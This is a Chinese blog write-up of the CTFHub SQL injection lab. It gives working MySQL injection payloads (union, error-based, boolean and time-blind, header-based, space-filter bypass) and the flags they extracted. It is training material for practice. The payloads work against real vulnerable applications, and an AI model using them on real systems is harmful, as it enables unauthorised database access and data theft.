CTFHub ---> SQL注入!!

最新推荐文章于 2024-08-14 08:00:00 发布
最新推荐文章于 2024-08-14 08:00:00 发布
阅读量1.5k 收藏 23
点赞数 20
文章标签: 网络攻击模型 sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/huohaowen/article/details/136314843
版权

今天就来打一下CTFhub的sql注入的靶场吧,刚好回顾一下,防止忘了!!!

开打!!!

1.数字型注入

这个题目这么直接的吗??直接告诉我的注入类型!!! 那我就不客气了!!

1+order+by+* //其中的*是你猜的

在我猜到3的时候就没有回显了!! 所以返回的column只有两行

0+union+select+1,database()  //爆他数据库

结果回显是sqli,于是就开始可以进行红队的操作了!!!

-1+union+select+2,(select+group_concat(table_name) +from+information_schema.tables+where+table_schema="sqli")

  能发现有一个表名是flag 

猜测flag可能就在这个flag的列里面,所以我们就继续爆字段名字

-1+union+select+2(select+group_concat(column_name)+from+information_schema.columns+where+table_schema="sqli"+and+table_name="flag")--+

 就能发现有一个字段名字叫做flag

看我干嘛?? 继续啊!!!嘻嘻

0+union+select+2,(select+flag+from+flag+)--+

成功拿到flag !!! 

ctfhub{b43dd8c3a29b55efea2182d3}

2.字符型注入

这题,还要判断 !!! 不能直接硬搬上面的poc

通过上面的判断可以发现 --+没有发挥起对应的作用,所以我们就要换一种poc!!

-1'+union+select+(select+group_concat(table_name) +from+information_schema.tables+where+table_schema="sqli"),'2

 这样,才能报错flag的表名,剩下就肥肠熟悉了

-1'+union+select+(select+group_concat(column_name)+from+information_schema.columns+where+table_schema="sqli"+and+table_name="flag"),'2

 发现对应的字段名字只有一个flag

继续!!!

0'+union+select+(select+flag+from+flag+),'2

 

终于算是拿到了flag了!!!

ctfhub{547ca1239ac9156739e996b5

3.报错注入

这关有点意思!!!

首先它是报错注入,那就先判断注入类型 然后你就会发现无论加多少个 ' 都是显示报错

  很明显数字型!!!     ✔️😊😊  

然后就是开注了!!

1 and extractvalue(1,concat(0x7e,(database()),0x7e))

可以看见它的数据库名字还是sqli!!

1 and extractvalue(1,concat(0x7e,(  select+group_concat(table_name)  from information_schema.tables where table_schema="sqli"      ),0x7e))

可以看见两个表 分别是news 和flag !! 那就继续爆flag的就完事了

1 and extractvalue(1,concat(0x7e,(   select group_concat(column_name) from information_schema.columns where table_schema="sqli" and table_name="flag"   ),0x7e))

可以看见了表单flag里面有一个flag的字段,那就继续!!!

1 and updatexml(1,substr(concat(0x7e,(select flag from flag ),0x7e),1,32),1)

 结果能看到这样!!

聪明的大家应改也发现了吧!!! 最后面的~不见了!!!!!

这是因为updatexml在一次最多只能返回32的长度数值,这个肯定超过了嘛!!!

所以我们只需要稍微更改一下poc!!

1 and updatexml(1,substr(concat(0x7e,(select flag from flag ),0x7e),32,50),1)

?? 牛魔 这关意思就是,就刚好是前面的!!后面根本没有了!! 

所以有没有一种可能,这一关可以歪打正着,直接提交第一次得到的结果也能拿flag!!!

ctfhub{4a331b0296b31c6f3d76403c

4.布尔盲注!

到了这一关,工作量一下子就变得很大了!!! 

先能简单的判断出它的类型是数字型 !! 而且,它只会返回

  1. query succeed
  2. query failed 

这两个字段!!! 所以就是盲注了!!! 开始我们的poc

1+and+length(schema())=4

  可以看出来 它的数据库长度是4

 那么就开始BP去跑字典

然后再去跑它的表单名

1+and+substr((select+group_concat(table_name)+from+information_schema.tables+where+table_schema="sqli"),1,1)='a'

得到结果的表单名是flag

那么就继续咯,继续爆它的字段名字

2+and+substr((select+group_concat(column_name)+from+information_schema.columns+where+table_schema="sqli"+and+table_name="flag"),2,1)='l'

发现它的字段名字也是flag!!!

那就到了最后的爆值了

2+and+substr((select+flag+from+flag+),2,1)='l'

就能成功的拿到了flag

ctfhub{f4a436b2f9e6083abd1aa2d8}

5.时间盲注

这一关就和以前一样啦,但是不过时间久一点而已,于是小小编这里就直接展示最后一步了!!

2+and+if(substr((select+flag+from+flag+),§1§,1)='§a§',sleep(2),0)

成功拿到flag (看的我老眼昏花)

 好想四, 好想似,好想嘶 ........

ctfhub{db8d12b4edbab47967aa2294}

6. SQL结构

NYD你终于知道要换表单了是吧!!!

这关其实和前面一样,不过就是要花点时间,和你的耐心(md我做的想死)

直接展示成果吧

可以得到一个表单的名字叫做 bzhrgigypq

继续得到一个字段名字叫做 tttavsvbgl 牛魔的

nmd 给我整抽象的是吧,什么逆天表单名,什么逆天字段名   

但是生活还得继续(突然升华) ,我是说这个flag还是得继续拿!!

看得我想死,但是还是能拿到flag的

ctfhub{6a41a535df8da9294d8dd8dd}

7. Cookie注入&&UA注入&&Refer注入

这三关都是一样的,靠你耐心就好了

可以分别得到表单名,字段名,以及flag

jzcudwccmw
dchxyddhiv
ctfhub{6d83b49e40c80cca20612ae8}

8.过滤空格

过滤空格,那我们直接用 /**/不就好了嘛!!这里用联合查询   

-1/**/union/**/select/**/(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema="sqli"),user()

能得到一个表单叫做 qwvnoxjrpv 继续!!

-1/**/union/**/select/**/(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_schema="sqli"/**/and/**/table_name="qwvnoxjrpv"),user()

又得到一个字段叫做 cxuwyqyoym 最终的poc 

-1/**/union/**/select/**/(select/**/cxuwyqyoym/**/from/**/qwvnoxjrpv/**/),user()

   这样,就能拿到flag啦!!

ctfhub{c5072185a6c0ed2bf3a4303e}

补充

1.UA类注入

今天小编刷文章的时候无意之间发现了ua注入这种 ,我写的方法都是报错注入

但是正常网站一般是不会回显给客户的!!!在nisp2级中,这叫最小反馈原则,而不是安全处理系统异常,哈哈哈最近在备考nisp2级

所以这里再给出一种方法,也是基本上最常用的方法!! 时间盲注

INSERT INTO damn.world_final (username, score) VALUES ((SELECT SLEEP(5)), 1);

可以看到,响应用了5s,我们可以去查看插入的结果

可以看见这种注入在成功注入的情况下,又不会对数据库产生影响!!!

2.内联注入

那既然都有了UA类了,是不是也有内联注释类的注入呢??

那肯定有的嘛!!!

 

看,是吧,这样可以直接用来检验sleep是否被过滤,以及是否可用!!!

WanKlii
关注
10-sql注入-mysql注入1
08-03
SQL注入是一种常见的安全漏洞,通常发生在Web应用程序中,允许攻击者通过输入恶意SQL代码来操纵数据库。MySQL注入是其中一种,特别针对使用MySQL数据库的应用。本文将深入探讨MySQL注入的原理、常见攻击手段以及防范...
CTFHUB-WEB-SQL注入
K_ShenH的博客
06-09 1255
CTFHUB-WEB-SQL注入
CTFHub-sql注入
qq_60905276的博客
01-30 5786
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHub~SQL注入超简单详细教程
最新发布
weixin_67832625的博客
08-14 1032
本文主要是对CTFHub靶场的SQL注入做了详细的教程讲解,让练习者对SQL注入有更详细的了解和深入,如有什么问题,随时联系作者
Ctfhub - web -- SQL注入
m0_52920608的博客
01-28 3935
CTFHub sql注入 web mysql python脚本
CTFHUBsql注入(特详解)
小宇的web博客
06-16 2845
CTFHUBsql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞 加单引号 去掉‘加上and 1=1发现出现了回显 将1=1变为1=2,语句正确但是无法访问数据库 这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量 这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置 这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置 4.获取数据库库名 1)获取当前数据库库名,数据库的名称为
CTFHub-SQL注入
yuqie的博客
06-13 1099
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
CTFHUB-SQL注入
m_de_g的博客
08-11 5898
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
sqli-labs-master.zip sql注入的学习靶机
01-18
sql注入的学习靶机,由于github经常挂,这里特提供大家下载。
ruoyi-vue-pro sql
08-06
各模块的sql
CTFHub(SQL注入)
cxiaodi的博客
05-09 1316
CTFHubSQL注入专题)
CTFHub——SQL注入
Aquarius_ego的博客
05-05 1739
CTFHub——SQL注入(报错注入、布尔盲注、时间盲注、MySQL结构、Cookie注入、UA注入、Refer注入、过滤空格)
CTFHub技能树 Web-SQL注入详解
千寻的博客
11-21 2073
所谓SQL注入就是用户在能够控制SQL查询、更新、插入、删除等语句的参数的情况下,攻击者通过构造特殊的输入字符串使后端程序错误地识别SQL查询语句中的代码与数据部分从而导致数据库管理系统输出了非预期的结果的一种行为。
CTFHUB|SQL注入(sqlmap)
m0_60651303的博客
07-14 1255
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHub SQL注入
2302_81010533的博客
04-03 1075
SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感信息、修改数据甚至控制整个数据库。
CtfhubSQL注入|SQL报错注入及原理详解
tempulcc的博客
10-10 1526
手工测试sql注入及原理1、SQL 整数型注入查数据库名查数据表查flag表字段2、字符型注入3、报错注入updatexml() 函数致MYSQL显错注入原理updatexml() 函数定义updatexml() 函数运行机制updatexml() 函数运行示例不报错示例构造报错利用updatexml()测试ctfhub的显错注入 1、SQL 整数型注入 查数据库名 -1 union select group_concat(schema_name),2 from information_schema.sch
ctfhub技能树web基础认证
03-13
CTFHub是一个CTF(Capture The Flag)竞赛平台,提供了丰富的技能树来帮助学习者提升Web基础认证的能力。下面是CTFHub技能树中关于Web基础认证的内容: 1. HTTP协议:了解HTTP协议的基本原理和常见的请求方法(GET、POST等),了解HTTP请求和响应的结构。 2. URL编码和解码:学习URL编码和解码的原理和常见的编码方式,如URL编码中的%20代表空格。 3. Cookies:了解Cookies的作用和原理,学习如何使用Cookies进行用户认证和状态管理。 4. Session管理:学习Session的概念和原理,了解如何使用Session进行用户认证和状态管理。 5. 基本认证(Basic Authentication):学习基本认证的原理和流程,了解如何使用用户名和密码进行认证。 6. 表单认证(Form-based Authentication):学习表单认证的原理和流程,了解如何使用表单提交用户名和密码进行认证。 7. Token认证:学习Token认证的原理和流程,了解如何使用Token进行用户认证和状态管理。 8. CSRF攻击与防御:学习CSRF(Cross-Site Request Forgery)攻击的原理和常见的防御措施9. XSS攻击与防御:学习XSS(Cross-Site Scripting)攻击的原理和常见的防御措施10. SQL注入攻击与防御:学习SQL注入攻击的原理和常见的防御措施。 以上是CTFHub技能树中关于Web基础认证的内容,通过学习这些知识,你可以提升自己在Web安全领域的认证技能。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值